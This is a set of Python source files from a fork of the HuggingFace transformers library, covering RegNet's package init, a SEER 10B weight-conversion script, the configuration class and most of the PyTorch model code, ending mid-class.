    pytorch_dump_folder_path: Path = args.pytorch_dump_folder_path
    # Create the output directory (and any missing parents) before converting.
    pytorch_dump_folder_path.mkdir(exist_ok=True, parents=True)
    convert_weights_and_push(pytorch_dump_folder_path, args.model_name, args.push_to_hub)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 2,490 | src/transformers/models/regnet/__init__.py | # Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...utils import OptionalDependencyNotAvailable, _LazyModule, is_tf_available, is_torch_available
# Base (always importable) structure: the configuration module has no framework dependency.
_import_structure = {"configuration_regnet": ["REGNET_PRETRAINED_CONFIG_ARCHIVE_MAP", "RegNetConfig"]}

# PyTorch model classes are only registered when torch is installed.
try:
    if not is_torch_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_regnet"] = [
        "REGNET_PRETRAINED_MODEL_ARCHIVE_LIST",
        "RegNetForImageClassification",
        "RegNetModel",
        "RegNetPreTrainedModel",
    ]

# TensorFlow model classes are only registered when TF is installed.
try:
    if not is_tf_available():
        raise OptionalDependencyNotAvailable()
except OptionalDependencyNotAvailable:
    pass
else:
    _import_structure["modeling_tf_regnet"] = [
        "TF_REGNET_PRETRAINED_MODEL_ARCHIVE_LIST",
        "TFRegNetForImageClassification",
        "TFRegNetModel",
        "TFRegNetPreTrainedModel",
    ]

if TYPE_CHECKING:
    # Static imports so type checkers and IDEs can resolve the real symbols.
    from .configuration_regnet import REGNET_PRETRAINED_CONFIG_ARCHIVE_MAP, RegNetConfig

    try:
        if not is_torch_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_regnet import (
            REGNET_PRETRAINED_MODEL_ARCHIVE_LIST,
            RegNetForImageClassification,
            RegNetModel,
            RegNetPreTrainedModel,
        )

    try:
        if not is_tf_available():
            raise OptionalDependencyNotAvailable()
    except OptionalDependencyNotAvailable:
        pass
    else:
        from .modeling_tf_regnet import (
            TF_REGNET_PRETRAINED_MODEL_ARCHIVE_LIST,
            TFRegNetForImageClassification,
            TFRegNetModel,
            TFRegNetPreTrainedModel,
        )

else:
    import sys

    # At runtime, replace this module with a lazy loader that imports each
    # submodule only on first attribute access.
    sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 11,782 | src/transformers/models/regnet/convert_regnet_seer_10b_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert RegNet 10B checkpoints vissl."""
# You need to install a specific version of classy vision
# pip install git+https://github.com/FrancescoSaverioZuppichini/ClassyVision.git@convert_weights
import argparse
import json
import os
import re
from collections import OrderedDict
from dataclasses import dataclass, field
from functools import partial
from pathlib import Path
from pprint import pprint
from typing import Dict, List, Tuple
import torch
import torch.nn as nn
from classy_vision.models.regnet import RegNet, RegNetParams
from huggingface_hub import cached_download, hf_hub_url
from torch import Tensor
from vissl.models.model_helpers import get_trunk_forward_outputs
from transformers import AutoFeatureExtractor, RegNetConfig, RegNetForImageClassification, RegNetModel
from transformers.modeling_utils import PreTrainedModel
from transformers.utils import logging
logging.set_verbosity_info()
logger = logging.get_logger()
@dataclass
class Tracker:
    """Records the leaf modules of a model, in execution order, by attaching
    temporary forward hooks and running a single forward pass."""

    module: nn.Module
    traced: List[nn.Module] = field(default_factory=list)
    handles: list = field(default_factory=list)
    name2module: Dict[str, nn.Module] = field(default_factory=OrderedDict)

    def _forward_hook(self, m, inputs: Tensor, outputs: Tensor, name: str):
        # A "leaf" is a module with no children, or a conv / batch-norm layer.
        is_leaf = len(list(m.modules())) == 1 or isinstance(m, (nn.Conv2d, nn.BatchNorm2d))
        if is_leaf:
            self.traced.append(m)
            self.name2module[name] = m

    def __call__(self, x: Tensor):
        # Hook every submodule, fire them with one forward pass, then clean up.
        for name, module in self.module.named_modules():
            handle = module.register_forward_hook(partial(self._forward_hook, name=name))
            self.handles.append(handle)
        self.module(x)
        for handle in self.handles:
            handle.remove()
        return self

    @property
    def parametrized(self):
        """Only the traced modules that actually hold learnable parameters."""
        return {
            name: module
            for name, module in self.name2module.items()
            if len(module.state_dict()) > 0
        }
class FakeRegNetVisslWrapper(nn.Module):
    """
    Fake wrapper for RegNet that mimics what vissl does without the need to pass a config file.

    Exposes the classy-vision RegNet's stem and stages as the `_feature_blocks`
    ModuleDict that vissl's `get_trunk_forward_outputs` helper expects.
    """

    def __init__(self, model: nn.Module):
        super().__init__()

        feature_blocks: List[Tuple[str, nn.Module]] = []
        # - get the stem
        feature_blocks.append(("conv1", model.stem))
        # - get all the feature blocks, renamed "res2", "res3", ... (vissl naming)
        for k, v in model.trunk_output.named_children():
            assert k.startswith("block"), f"Unexpected layer name {k}"
            block_index = len(feature_blocks) + 1
            feature_blocks.append((f"res{block_index}", v))

        self._feature_blocks = nn.ModuleDict(feature_blocks)

    def forward(self, x: Tensor):
        # Delegate to vissl's helper so outputs match the original pipeline.
        return get_trunk_forward_outputs(
            x,
            out_feat_keys=None,
            feature_blocks=self._feature_blocks,
        )
class FakeRegNetParams(RegNetParams):
    """
    Used to instantiate a RegNet model from classy vision with the same depth as the 10B one but with super small
    parameters, so we can trace it in memory.
    """

    def get_expanded_params(self):
        # Same per-stage depths as the 10B model (2, 7, 17, 1) but with tiny widths
        # so the traced model fits in memory.
        # NOTE(review): tuple field order assumed to follow classy_vision's
        # expanded-params convention — confirm against the RegNetParams source.
        return [(8, 2, 2, 8, 1.0), (8, 2, 7, 8, 1.0), (8, 2, 17, 8, 1.0), (8, 2, 1, 8, 1.0)]
def get_from_to_our_keys(model_name: str) -> Dict[str, str]:
    """
    Returns a dictionary that maps from original model's key -> our implementation's keys

    Both models are instantiated with tiny weights (same depths), traced with a
    single forward pass, and their parameter keys are paired positionally — this
    relies on both traces producing parameters in the same order.
    """

    # create our model (with small weights)
    our_config = RegNetConfig(depths=[2, 7, 17, 1], hidden_sizes=[8, 8, 8, 8], groups_width=8)
    if "in1k" in model_name:
        our_model = RegNetForImageClassification(our_config)
    else:
        our_model = RegNetModel(our_config)
    # create from model (with small weights)
    from_model = FakeRegNetVisslWrapper(
        RegNet(FakeRegNetParams(depth=27, group_width=1010, w_0=1744, w_a=620.83, w_m=2.52))
    )

    with torch.no_grad():
        from_model = from_model.eval()
        our_model = our_model.eval()

        # a tiny input is enough: we only need the hooks to fire, not real features
        x = torch.randn((1, 3, 32, 32))
        # trace both
        dest_tracker = Tracker(our_model)
        dest_traced = dest_tracker(x).parametrized

        pprint(dest_tracker.name2module)
        src_tracker = Tracker(from_model)
        src_traced = src_tracker(x).parametrized

    # convert the keys -> module dict to keys -> params
    def to_params_dict(dict_with_modules):
        # flatten each module's state dict into "<module name>.<param name>" keys
        params_dict = OrderedDict()
        for name, module in dict_with_modules.items():
            for param_name, param in module.state_dict().items():
                params_dict[f"{name}.{param_name}"] = param
        return params_dict

    from_to_ours_keys = {}

    src_state_dict = to_params_dict(src_traced)
    dst_state_dict = to_params_dict(dest_traced)

    # pair keys positionally: i-th source parameter maps to i-th destination parameter
    for (src_key, src_param), (dest_key, dest_param) in zip(src_state_dict.items(), dst_state_dict.items()):
        from_to_ours_keys[src_key] = dest_key
        logger.info(f"{src_key} -> {dest_key}")
    # if "in1k" was in the model_name it means it must have a classification head (was finetuned)
    if "in1k" in model_name:
        from_to_ours_keys["0.clf.0.weight"] = "classifier.1.weight"
        from_to_ours_keys["0.clf.0.bias"] = "classifier.1.bias"

    return from_to_ours_keys
def convert_weights_and_push(save_directory: Path, model_name: str = None, push_to_hub: bool = True):
    """Convert the original SEER 10B RegNet checkpoint `model_name`, store the
    converted state dict under `save_directory`, and optionally push the model
    and its feature extractor to the Hugging Face hub.

    Args:
        save_directory: Directory used both as the torch-hub download cache and
            as the destination for the converted `<model_name>.pth` file.
        model_name: One of "regnet-y-10b-seer" or "regnet-y-10b-seer-in1k".
        push_to_hub: If True, upload the converted model and feature extractor.
    """
    filename = "imagenet-1k-id2label.json"
    num_labels = 1000
    repo_id = "huggingface/label-files"
    # Map ImageNet class ids to human-readable labels (and back) for the config.
    label_file = cached_download(hf_hub_url(repo_id, filename, repo_type="dataset"))
    with open(label_file, "r") as fp:  # close the handle instead of leaking it
        id2label = json.load(fp)
    id2label = {int(k): v for k, v in id2label.items()}
    label2id = {v: k for k, v in id2label.items()}

    ImageNetPreTrainedConfig = partial(RegNetConfig, num_labels=num_labels, id2label=id2label, label2id=label2id)

    names_to_config = {
        "regnet-y-10b-seer": ImageNetPreTrainedConfig(
            depths=[2, 7, 17, 1], hidden_sizes=[2020, 4040, 11110, 28280], groups_width=1010
        ),
        # finetuned on imagenet
        "regnet-y-10b-seer-in1k": ImageNetPreTrainedConfig(
            depths=[2, 7, 17, 1], hidden_sizes=[2020, 4040, 11110, 28280], groups_width=1010
        ),
    }

    # add seer weights logic
    def load_using_classy_vision(checkpoint_url: str) -> Tuple[Dict, Dict]:
        """Download a vissl checkpoint and return (trunk state dict, head state dict)."""
        files = torch.hub.load_state_dict_from_url(checkpoint_url, model_dir=str(save_directory), map_location="cpu")
        # check if we have a head, if yes add it
        model_state_dict = files["classy_state_dict"]["base_model"]["model"]
        return model_state_dict["trunk"], model_state_dict["heads"]

    names_to_from_model = {
        "regnet-y-10b-seer": partial(
            load_using_classy_vision,
            "https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_regnet10B/model_iteration124500_conso.torch",
        ),
        "regnet-y-10b-seer-in1k": partial(
            load_using_classy_vision,
            "https://dl.fbaipublicfiles.com/vissl/model_zoo/seer_finetuned/seer_10b_finetuned_in1k_model_phase28_conso.torch",
        ),
    }

    from_to_ours_keys = get_from_to_our_keys(model_name)

    # Skip the (expensive) download + conversion when the converted state dict already exists.
    if not (save_directory / f"{model_name}.pth").exists():
        logger.info("Loading original state_dict.")
        from_state_dict_trunk, from_state_dict_head = names_to_from_model[model_name]()
        from_state_dict = from_state_dict_trunk
        if "in1k" in model_name:
            # add the classification head weights
            from_state_dict = {**from_state_dict_trunk, **from_state_dict_head}
        logger.info("Done!")

        converted_state_dict = {}

        not_used_keys = list(from_state_dict.keys())
        regex = r"\.block.-part."
        # this is "interesting", so the original checkpoints have `block[0,1]-part` in each key name, we remove it
        for key in from_state_dict.keys():
            # remove the weird "block[0,1]-part" from the key
            src_key = re.sub(regex, "", key)
            # now src_key from the model checkpoints is the one we got from the original model after tracing, so use it to get the correct destination key
            dest_key = from_to_ours_keys[src_key]
            # store the parameter with our key
            converted_state_dict[dest_key] = from_state_dict[key]
            not_used_keys.remove(key)
        # check that all keys have been converted
        assert len(not_used_keys) == 0, f"Some keys where not used {','.join(not_used_keys)}"

        # save our state dict to disk
        torch.save(converted_state_dict, save_directory / f"{model_name}.pth")

        del converted_state_dict
    else:
        logger.info("The state_dict was already stored on disk.")
    if push_to_hub:
        # SECURITY: never log the token itself — only report whether it is set.
        logger.info(f"HF_TOKEN is {'set' if os.environ.get('HF_TOKEN') else 'NOT set'}")
        logger.info("Loading our model.")
        # create our model
        our_config = names_to_config[model_name]
        our_model_func = RegNetModel
        if "in1k" in model_name:
            our_model_func = RegNetForImageClassification
        our_model = our_model_func(our_config)
        # place our model to the meta device (so remove all the weights)
        our_model.to(torch.device("meta"))
        logger.info("Loading state_dict in our model.")
        # load state dict
        state_dict_keys = our_model.state_dict().keys()
        PreTrainedModel._load_pretrained_model_low_mem(
            our_model, state_dict_keys, [save_directory / f"{model_name}.pth"]
        )
        logger.info("Finally, pushing!")
        # push it to hub
        our_model.push_to_hub(
            repo_path_or_name=save_directory / model_name,
            commit_message="Add model",
            output_dir=save_directory / model_name,
        )
        size = 384
        # we can use the convnext one (same preprocessing)
        feature_extractor = AutoFeatureExtractor.from_pretrained("facebook/convnext-base-224-22k-1k", size=size)
        feature_extractor.push_to_hub(
            repo_path_or_name=save_directory / model_name,
            commit_message="Add feature extractor",
            output_dir=save_directory / model_name,
        )
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    # Required parameters
    parser.add_argument(
        "--model_name",
        default=None,
        type=str,
        help=(
            "The name of the model you wish to convert, it must be one of the supported regnet* architecture,"
            " currently: regnetx-*, regnety-*. If `None`, all of them will the converted."
        ),
    )
    parser.add_argument(
        "--pytorch_dump_folder_path",
        default=None,
        type=Path,
        required=True,
        help="Path to the output PyTorch model directory.",
    )
    # NOTE(review): `type=bool` makes ANY non-empty string truthy, so
    # `--push_to_hub False` still parses as True — confirm intended usage.
    parser.add_argument(
        "--push_to_hub",
        default=True,
        type=bool,
        required=False,
        help="If True, push model and feature extractor to the hub.",
    )

    args = parser.parse_args()

    pytorch_dump_folder_path: Path = args.pytorch_dump_folder_path
    # create the output directory (and any missing parents) before converting
    pytorch_dump_folder_path.mkdir(exist_ok=True, parents=True)
    convert_weights_and_push(pytorch_dump_folder_path, args.model_name, args.push_to_hub)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 4,088 | src/transformers/models/regnet/configuration_regnet.py | # coding=utf-8
# Copyright 2022 Meta Platforms, Inc. and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" RegNet model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
REGNET_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"facebook/regnet-y-040": "https://huggingface.co/facebook/regnet-y-040/blob/main/config.json",
}
class RegNetConfig(PretrainedConfig):
    r"""
    This is the configuration class to store the configuration of a [`RegNetModel`]. It is used to instantiate a RegNet
    model according to the specified arguments, defining the model architecture. Instantiating a configuration with the
    defaults will yield a similar configuration to that of the RegNet
    [facebook/regnet-y-040](https://huggingface.co/facebook/regnet-y-040) architecture.

    Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
    documentation from [`PretrainedConfig`] for more information.

    Args:
        num_channels (`int`, *optional*, defaults to 3):
            The number of input channels.
        embedding_size (`int`, *optional*, defaults to 32):
            Dimensionality (hidden size) for the embedding layer.
        hidden_sizes (`List[int]`, *optional*, defaults to `[128, 192, 512, 1088]`):
            Dimensionality (hidden size) at each stage.
        depths (`List[int]`, *optional*, defaults to `[2, 6, 12, 2]`):
            Depth (number of layers) for each stage.
        groups_width (`int`, *optional*, defaults to 64):
            Width of each group used by the grouped convolutions inside the layers.
        layer_type (`str`, *optional*, defaults to `"y"`):
            The layer to use, it can be either `"x" or `"y"`. An `x` layer is a ResNet's BottleNeck layer with
            `reduction` fixed to `1`. While a `y` layer is a `x` but with squeeze and excitation. Please refer to the
            paper for a detailed explanation of how these layers were constructed.
        hidden_act (`str`, *optional*, defaults to `"relu"`):
            The non-linear activation function in each block. If string, `"gelu"`, `"relu"`, `"selu"` and `"gelu_new"`
            are supported.

    Example:
    ```python
    >>> from transformers import RegNetConfig, RegNetModel

    >>> # Initializing a RegNet regnet-y-40 style configuration
    >>> configuration = RegNetConfig()

    >>> # Initializing a model from the regnet-y-40 style configuration
    >>> model = RegNetModel(configuration)

    >>> # Accessing the model configuration
    >>> configuration = model.config
    ```
"""

    model_type = "regnet"
    layer_types = ["x", "y"]

    def __init__(
        self,
        num_channels=3,
        embedding_size=32,
        hidden_sizes=None,
        depths=None,
        groups_width=64,
        layer_type="y",
        hidden_act="relu",
        **kwargs,
    ):
        super().__init__(**kwargs)
        if layer_type not in self.layer_types:
            raise ValueError(f"layer_type={layer_type} is not one of {','.join(self.layer_types)}")
        self.num_channels = num_channels
        self.embedding_size = embedding_size
        # `None` sentinels instead of mutable list defaults: with list literals in
        # the signature, every config created without an explicit value would store
        # (and could mutate) the very same shared list object.
        self.hidden_sizes = [128, 192, 512, 1088] if hidden_sizes is None else hidden_sizes
        self.depths = [2, 6, 12, 2] if depths is None else depths
        self.groups_width = groups_width
        self.layer_type = layer_type
        self.hidden_act = hidden_act
        # always downsample in the first stage (not configurable for RegNet)
        self.downsample_in_first_stage = True
|
27182812/ChatGLM-LLaMA-chinese-insturct | 17,533 | src/transformers/models/regnet/modeling_regnet.py | # coding=utf-8
# Copyright 2022 Meta Platforms, Inc. and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch RegNet model."""
from typing import Optional
import torch
import torch.utils.checkpoint
from torch import Tensor, nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from ...activations import ACT2FN
from ...file_utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward
from ...modeling_outputs import (
BaseModelOutputWithNoAttention,
BaseModelOutputWithPoolingAndNoAttention,
ImageClassifierOutputWithNoAttention,
)
from ...modeling_utils import PreTrainedModel
from ...utils import logging
from .configuration_regnet import RegNetConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "RegNetConfig"
# Base docstring
_CHECKPOINT_FOR_DOC = "facebook/regnet-y-040"
_EXPECTED_OUTPUT_SHAPE = [1, 1088, 7, 7]
# Image classification docstring
_IMAGE_CLASS_CHECKPOINT = "facebook/regnet-y-040"
_IMAGE_CLASS_EXPECTED_OUTPUT = "tabby, tabby cat"
REGNET_PRETRAINED_MODEL_ARCHIVE_LIST = [
"facebook/regnet-y-040",
# See all regnet models at https://huggingface.co/models?filter=regnet
]
class RegNetConvLayer(nn.Module):
    """Convolution -> batch norm -> (optional) activation, with "same"-style padding."""

    def __init__(
        self,
        in_channels: int,
        out_channels: int,
        kernel_size: int = 3,
        stride: int = 1,
        groups: int = 1,
        activation: Optional[str] = "relu",
    ):
        super().__init__()
        # `kernel_size // 2` padding keeps the spatial size unchanged at stride 1
        self.convolution = nn.Conv2d(
            in_channels,
            out_channels,
            kernel_size=kernel_size,
            stride=stride,
            padding=kernel_size // 2,
            groups=groups,
            bias=False,
        )
        self.normalization = nn.BatchNorm2d(out_channels)
        # a `None` activation name means "no activation" (identity)
        if activation is None:
            self.activation = nn.Identity()
        else:
            self.activation = ACT2FN[activation]

    def forward(self, hidden_state):
        return self.activation(self.normalization(self.convolution(hidden_state)))
class RegNetEmbeddings(nn.Module):
    """
    RegNet Embedddings (stem) composed of a single aggressive convolution.
    """

    def __init__(self, config: RegNetConfig):
        super().__init__()
        # a single stride-2 3x3 convolution halves the spatial resolution
        self.embedder = RegNetConvLayer(
            config.num_channels, config.embedding_size, kernel_size=3, stride=2, activation=config.hidden_act
        )
        self.num_channels = config.num_channels

    def forward(self, pixel_values):
        # guard against inputs whose channel count disagrees with the config
        if pixel_values.shape[1] != self.num_channels:
            raise ValueError(
                "Make sure that the channel dimension of the pixel values match with the one set in the configuration."
            )
        return self.embedder(pixel_values)
# Copied from transformers.models.resnet.modeling_resnet.ResNetShortCut with ResNet->RegNet
class RegNetShortCut(nn.Module):
    """
    RegNet shortcut, used to project the residual features to the correct size. If needed, it is also used to
    downsample the input using `stride=2`.
    """

    def __init__(self, in_channels: int, out_channels: int, stride: int = 2):
        super().__init__()
        # 1x1 convolution: adjusts the channel count (and spatial size via `stride`)
        self.convolution = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=stride, bias=False)
        self.normalization = nn.BatchNorm2d(out_channels)

    def forward(self, input: Tensor) -> Tensor:
        # project, then normalize — no activation on the shortcut branch
        hidden_state = self.convolution(input)
        hidden_state = self.normalization(hidden_state)
        return hidden_state
class RegNetSELayer(nn.Module):
    """
    Squeeze and Excitation layer (SE) proposed in [Squeeze-and-Excitation Networks](https://arxiv.org/abs/1709.01507).
    """

    def __init__(self, in_channels: int, reduced_channels: int):
        super().__init__()
        self.pooler = nn.AdaptiveAvgPool2d((1, 1))
        # bottleneck MLP (expressed as 1x1 convs) producing one sigmoid gate per channel
        self.attention = nn.Sequential(
            nn.Conv2d(in_channels, reduced_channels, kernel_size=1),
            nn.ReLU(),
            nn.Conv2d(reduced_channels, in_channels, kernel_size=1),
            nn.Sigmoid(),
        )

    def forward(self, hidden_state):
        # squeeze: (b, c, h, w) -> (b, c, 1, 1); excite: rescale every channel
        gate = self.attention(self.pooler(hidden_state))
        return hidden_state * gate
class RegNetXLayer(nn.Module):
    """
    RegNet's layer composed by three `3x3` convolutions, same as a ResNet bottleneck layer with reduction = 1.
    """

    def __init__(self, config: RegNetConfig, in_channels: int, out_channels: int, stride: int = 1):
        super().__init__()
        # a projection shortcut is only needed when the residual's shape would change
        needs_projection = in_channels != out_channels or stride != 1
        groups = max(1, out_channels // config.groups_width)
        if needs_projection:
            self.shortcut = RegNetShortCut(in_channels, out_channels, stride=stride)
        else:
            self.shortcut = nn.Identity()
        # 1x1 reduce -> grouped 3x3 (carries the stride) -> 1x1 expand, no final activation
        self.layer = nn.Sequential(
            RegNetConvLayer(in_channels, out_channels, kernel_size=1, activation=config.hidden_act),
            RegNetConvLayer(out_channels, out_channels, stride=stride, groups=groups, activation=config.hidden_act),
            RegNetConvLayer(out_channels, out_channels, kernel_size=1, activation=None),
        )
        self.activation = ACT2FN[config.hidden_act]

    def forward(self, hidden_state):
        residual = self.shortcut(hidden_state)
        hidden_state = self.layer(hidden_state)
        hidden_state += residual
        return self.activation(hidden_state)
class RegNetYLayer(nn.Module):
    """
    RegNet's Y layer: an X layer with Squeeze and Excitation.
    """

    def __init__(self, config: RegNetConfig, in_channels: int, out_channels: int, stride: int = 1):
        super().__init__()
        # project the residual only when its shape would not match the branch output
        should_apply_shortcut = in_channels != out_channels or stride != 1
        groups = max(1, out_channels // config.groups_width)
        self.shortcut = (
            RegNetShortCut(in_channels, out_channels, stride=stride) if should_apply_shortcut else nn.Identity()
        )
        self.layer = nn.Sequential(
            RegNetConvLayer(in_channels, out_channels, kernel_size=1, activation=config.hidden_act),
            RegNetConvLayer(out_channels, out_channels, stride=stride, groups=groups, activation=config.hidden_act),
            # SE gate with a bottleneck sized to a quarter of the *input* channels
            RegNetSELayer(out_channels, reduced_channels=int(round(in_channels / 4))),
            RegNetConvLayer(out_channels, out_channels, kernel_size=1, activation=None),
        )
        self.activation = ACT2FN[config.hidden_act]

    def forward(self, hidden_state):
        # residual branch + main branch, then a final activation
        residual = hidden_state
        hidden_state = self.layer(hidden_state)
        residual = self.shortcut(residual)
        hidden_state += residual
        hidden_state = self.activation(hidden_state)
        return hidden_state
class RegNetStage(nn.Module):
    """
    A RegNet stage composed by stacked layers.
    """

    def __init__(
        self,
        config: RegNetConfig,
        in_channels: int,
        out_channels: int,
        stride: int = 2,
        depth: int = 2,
    ):
        super().__init__()

        layer_cls = RegNetXLayer if config.layer_type == "x" else RegNetYLayer

        # the first layer performs the channel change and (optional) downsampling
        blocks = [layer_cls(config, in_channels, out_channels, stride=stride)]
        blocks.extend(layer_cls(config, out_channels, out_channels) for _ in range(depth - 1))
        self.layers = nn.Sequential(*blocks)

    def forward(self, hidden_state):
        return self.layers(hidden_state)
class RegNetEncoder(nn.Module):
    # Stacks the RegNet stages; optionally collects intermediate features
    # (each stage's input plus the final output) as `hidden_states`.
    def __init__(self, config: RegNetConfig):
        super().__init__()
        self.stages = nn.ModuleList([])
        # based on `downsample_in_first_stage`, the first layer of the first stage may or may not downsample the input
        self.stages.append(
            RegNetStage(
                config,
                config.embedding_size,
                config.hidden_sizes[0],
                stride=2 if config.downsample_in_first_stage else 1,
                depth=config.depths[0],
            )
        )
        # remaining stages: consecutive (in, out) channel pairs from the config
        in_out_channels = zip(config.hidden_sizes, config.hidden_sizes[1:])
        for (in_channels, out_channels), depth in zip(in_out_channels, config.depths[1:]):
            self.stages.append(RegNetStage(config, in_channels, out_channels, depth=depth))

    def forward(
        self, hidden_state: Tensor, output_hidden_states: bool = False, return_dict: bool = True
    ) -> BaseModelOutputWithNoAttention:
        # accumulate the input of every stage, then the final output (stem output first)
        hidden_states = () if output_hidden_states else None

        for stage_module in self.stages:
            if output_hidden_states:
                hidden_states = hidden_states + (hidden_state,)

            hidden_state = stage_module(hidden_state)

        if output_hidden_states:
            hidden_states = hidden_states + (hidden_state,)

        if not return_dict:
            # tuple form: (last_hidden_state,) or (last_hidden_state, hidden_states)
            return tuple(v for v in [hidden_state, hidden_states] if v is not None)

        return BaseModelOutputWithNoAttention(last_hidden_state=hidden_state, hidden_states=hidden_states)
class RegNetPreTrainedModel(PreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """

    config_class = RegNetConfig
    base_model_prefix = "regnet"
    main_input_name = "pixel_values"
    supports_gradient_checkpointing = True

    # Copied from transformers.models.resnet.modeling_resnet.ResNetPreTrainedModel._init_weights
    def _init_weights(self, module):
        # He (kaiming) init for convolutions; weight=1 / bias=0 for norm layers
        if isinstance(module, nn.Conv2d):
            nn.init.kaiming_normal_(module.weight, mode="fan_out", nonlinearity="relu")
        elif isinstance(module, (nn.BatchNorm2d, nn.GroupNorm)):
            nn.init.constant_(module.weight, 1)
            nn.init.constant_(module.bias, 0)

    def _set_gradient_checkpointing(self, module, value=False):
        # gradient checkpointing is toggled on the base model (RegNetModel)
        if isinstance(module, RegNetModel):
            module.gradient_checkpointing = value
REGNET_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. Use it
as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`RegNetConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
REGNET_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See
[`ConvNextImageProcessor.__call__`] for details.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
    "The bare RegNet model outputting raw features without any specific head on top.",
    REGNET_START_DOCSTRING,
)
# Copied from transformers.models.resnet.modeling_resnet.ResNetModel with RESNET->REGNET,ResNet->RegNet
class RegNetModel(RegNetPreTrainedModel):
    # Backbone: embeddings (stem) -> encoder (stages) -> global average pooling.
    def __init__(self, config):
        super().__init__(config)
        self.config = config
        self.embedder = RegNetEmbeddings(config)
        self.encoder = RegNetEncoder(config)
        # global average pooling to (batch, channels, 1, 1)
        self.pooler = nn.AdaptiveAvgPool2d((1, 1))
        # Initialize weights and apply final processing
        self.post_init()

    @add_start_docstrings_to_model_forward(REGNET_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=BaseModelOutputWithPoolingAndNoAttention,
        config_class=_CONFIG_FOR_DOC,
        modality="vision",
        expected_output=_EXPECTED_OUTPUT_SHAPE,
    )
    def forward(
        self, pixel_values: Tensor, output_hidden_states: Optional[bool] = None, return_dict: Optional[bool] = None
    ) -> BaseModelOutputWithPoolingAndNoAttention:
        # fall back to the config defaults when the flags are not passed explicitly
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        embedding_output = self.embedder(pixel_values)

        encoder_outputs = self.encoder(
            embedding_output, output_hidden_states=output_hidden_states, return_dict=return_dict
        )

        last_hidden_state = encoder_outputs[0]

        pooled_output = self.pooler(last_hidden_state)

        if not return_dict:
            # tuple output: (last_hidden_state, pooled_output, [hidden_states])
            return (last_hidden_state, pooled_output) + encoder_outputs[1:]

        return BaseModelOutputWithPoolingAndNoAttention(
            last_hidden_state=last_hidden_state,
            pooler_output=pooled_output,
            hidden_states=encoder_outputs.hidden_states,
        )
@add_start_docstrings(
    """
    RegNet Model with an image classification head on top (a linear layer on top of the pooled features), e.g. for
    ImageNet.
    """,
    REGNET_START_DOCSTRING,
)
# Copied from transformers.models.resnet.modeling_resnet.ResNetForImageClassification with RESNET->REGNET,ResNet->RegNet,resnet->regnet
# NOTE(review): "Copied from" is enforced by the repo's fix-copies tooling; only comments are added here.
class RegNetForImageClassification(RegNetPreTrainedModel):
    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.regnet = RegNetModel(config)
        # classification head
        self.classifier = nn.Sequential(
